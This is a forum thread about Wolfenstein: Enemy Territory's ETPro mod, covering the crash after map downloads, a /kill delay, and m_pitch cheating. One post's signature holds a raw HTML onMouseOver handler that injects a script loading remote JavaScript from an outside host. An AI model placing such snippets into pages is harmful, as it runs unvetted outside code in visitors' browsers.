Map download crash issue + other ideas

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

mortis

Map download crash issue + other ideas

Post by mortis »

Hi,

I am Mortis from broadbandreports.com (root level) [BBR] Enemy Territory and UT, and I also admin (root level) at Primer's Linux. Although this is my first post here, I peruse these forums from time to time. First of all, I'd like to thank all of the ETpro team from their tireless efforts to improve the game. You guys are miracle workers.

I have seen here and elsewhere that the reason that ET almost always crashes after downloading a new map is due to some sort of checksum error after the download. A cleverly timed /reconnect can avoid the crash out of ET. I see elsewhere, like int he Mac port thread for example, that Activision may be sharing SOME of the source code. Of all the issues in ET, I think the map crash out bug is something that really discourages noobs and even intermediate players from liking/trying new maps. Most of them don't even know that it is a game flaw; they just think your server is f'ed up. In terms of promoting the longevity of the game, I think that stable downloads would do wonders.

My ideas for solving the problem.

1. Get the source code and if possible fix it directly.

2. Failing that, would it be possible for ETpro to detect when a new map is downloaded, and then automatically /reconnect for the user after a one second delay?

3. If that is not possible, would it be possible to make a server command like b_maplistqueue "directory here" where all maps played on the server would be checked by etpro prior to connecting/joining?

other suggestions:

I changed the target of my shortcuts to start in etpro mode. "C:\Program Files\Wolfenstein - Enemy Territory\ET.exe" +set fs_game "etpro" This allows me to go directly to my ETpro settings. If ETpro was bundled into an installer, it should 'update' the shortcut for Wolfy to etpro as default IMO. Noobs can't figure out why their menus change and their favorites disappear because they don't understand that game is running in a different mode. Maybe there could be a tab in etpro called "tips" that gives specifics bits of advice, like how to start in etpro mode, etc.

/kill control. Although damage XP is nice, I have a more effective solution. I would prefer to have an optional two second delay on all /kill commands. This won't disable the function, doesn't stop /kill-ing for ammo, but does stop fools who are scared of getting blasted by a panzerfaust from /kill-ing to dodge your blast. They will be long dead before they can /kill out of it.

Mouse sensitivity. I have heard rumor lately that people are messing with the mouse sensitivity cvar to reduce up-and-down pitch rate relative to back-and-forth. So they are able to whip the gun left to right very fast, but the ability to keep the target on an enemy's head centered (up and down movement) is very stable. This seems like an exploit to me. I would love to see an etpro feature that requires uniform mouse sensitivity, or would simply override their setting while playing an etpro server. The variable involved is m_pitch.

Auto-move-to-spec I would love to see a built in countdown timer for 999 players that would move them automatically to spec when they are connection interrupted or downloading a new map for more than 60 sec. For that matter, it could be matched to the warmup time, so at the match start, all 999s are auto moved to spec, sparing the admins the jobs of stopping play to move 999s to spec.

I have more ideas; if any of these sound good, I'll happily delineate more ideas for you guys. If not, I won't litter your forums with yet more 'only if' threads. ;) I have dozens more of ideas brewing......

--Mortis
Ragnarok|GER

Re: Map download crash issue + other ideas

Post by Ragnarok|GER »

mortis wrote:Hi,
/kill control. Although damage XP is nice, I have a more effective solution. I would prefer to have an optional two second delay on all /kill commands. This won't disable the function, doesn't stop /kill-ing for ammo, but does stop fools who are scared of getting blasted by a panzerfaust from /kill-ing to dodge your blast. They will be long dead before they can /kill out of it.
pretty bad for competition. often u get the command "kill yourself" pretty late from your team-captain, so this option would just be annoying in clanwars.
dA*Rogue

Post by dA*Rogue »

Would involve more planning to /kill / trust in your teammates, and would be an alright option IMO - not like leagues have to implement it.

There are already m_pitch limits in place on every server I've played on...
=FF=im2good4u

Post by =FF=im2good4u »

best thing is to not post a crash to gether whit idea best ot post seperated else ppl only ocntine on 1 of the 2 things
duke'ku

Post by duke'ku »

mortis wrote: 1. Get the source code and if possible fix it directly.

2. Failing that, would it be possible for ETpro to detect when a new map is downloaded, and then automatically /reconnect for the user after a one second delay?
those would both require engine source
Rain

Post by Rain »

mortis wrote:I have seen here and elsewhere that the reason that ET almost always crashes after downloading a new map is due to some sort of checksum error after the download.
The current belief is, as far as I know, that some gnarly race condition happens involving the engine and the download thread. As we can't compile a full client, it's extremely difficult to debug.
mortis wrote:1. Get the source code and if possible fix it directly.
We'd like this to happen some day. zinx already has workable replacement code.
mortis wrote:2. Failing that, would it be possible for ETpro to detect when a new map is downloaded, and then automatically /reconnect for the user after a one second delay?
Unfortunately, this doesn't seem to work consistently. Some people need to quit outright just before the level actually loads.
mortis wrote:3. If that is not possible, would it be possible to make a server command like b_maplistqueue "directory here" where all maps played on the server would be checked by etpro prior to connecting/joining?
I've been considering an option to go along with b_campaignfile that forcefully references every map listed in a campaign. That'd have the same net effect.
mortis wrote:I changed the target of my shortcuts to start in etpro mode. "C:\Program Files\Wolfenstein - Enemy Territory\ET.exe" +set fs_game "etpro" This allows me to go directly to my ETpro settings. If ETpro was bundled into an installer, it should 'update' the shortcut for Wolfy to etpro as default IMO. Noobs can't figure out why their menus change and their favorites disappear because they don't understand that game is running in a different mode. Maybe there could be a tab in etpro called "tips" that gives specifics bits of advice, like how to start in etpro mode, etc.
Most of said "noobs" almost certainly have no idea what etpro even is—they end up with it because they downloaded it from a server running it. Having an installer likely wouldn't help much. We could likely have etpro itself create a shortcut, but that's an ugly way to do it and I'd prefer not to.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
*BiO*Tron

Post by *BiO*Tron »

Well tbh I think ultimately ETPro should replace vanilla ET completely anyway. 8) With all the uncountable bug fixes and improvements there's no need to have vanilla ET any more. Since almost all changes are optional, I also wouldn't see a limitation for other mod developers. On the contrary, I'm worried about the fact that the people who're coding Urban Terror or Price Of Peace will be left with all the general ETMain bugs that you already fixed in ETPro, like phantom traces, broken antilag, buggy pmove_fixed etc. etc.

I know it's not that easy and probably not possible at all but after id already let down the ET community by not having the game at Quakecon, maybe they (+Splashdamage?) could at least do the community the favour to allow you guys to do a whole new build of ET. Then you could also address all the issues still left like said download bugs and no "noob" would have to bother with running different mods. No one who just downloaded ET would end up on a buggy ETMain server, giving him if not a bad than at least not the "best" impression possible of the game.

Maybe this whole thing is a very long-term objective. ;)
bani
Site Admin

Post by bani »

urban terror is based off q3 code, so it wont have rtcw bugs. it also doesnt use the antilag code (they wrote their own) and it doesnt have pmove_fixed or anything like that.
Ragnarok|GER

Post by Ragnarok|GER »

bani wrote:urban terror is based off q3 code, so it wont have rtcw bugs. it also doesnt use the antilag code (they wrote their own) and it doesnt have pmove_fixed or anything like that.
i thought there'll be an >et-based urban terror< soon?
bani
Site Admin

Post by bani »

Ragnarok|GER wrote:
bani wrote:urban terror is based off q3 code, so it wont have rtcw bugs. it also doesnt use the antilag code (they wrote their own) and it doesnt have pmove_fixed or anything like that.
i thought there'll be an >et-based urban terror< soon?
its their q3 code ported directly to the et engine. it doesnt use any et code at all.
Ragnarok|GER

Post by Ragnarok|GER »

hmm.. why do they use et then? is it faster or anything like that?
bani
Site Admin

Post by bani »

because its free?
Maynard

Post by Maynard »

dA*Rogue wrote:Would involve more planning to /kill / trust in your teammates, and would be an alright option IMO - not like leagues have to implement it.

There are already m_pitch limits in place on every server I've played on...
I think what Mortis was thinking about was the m_pitch registry 'cheat'. I know nothing about coding or how etpro works, i do know it has additional anti-cheat support of some sort, could that possibly include checking for values out-side of et? like the m_mouse registry changes that allow you to simulate illegal values.

i'd point you toward better informed m_pitch cheat threads but they get deleted in almost every forum.
dA*Rogue

Post by dA*Rogue »

I've already read those threads.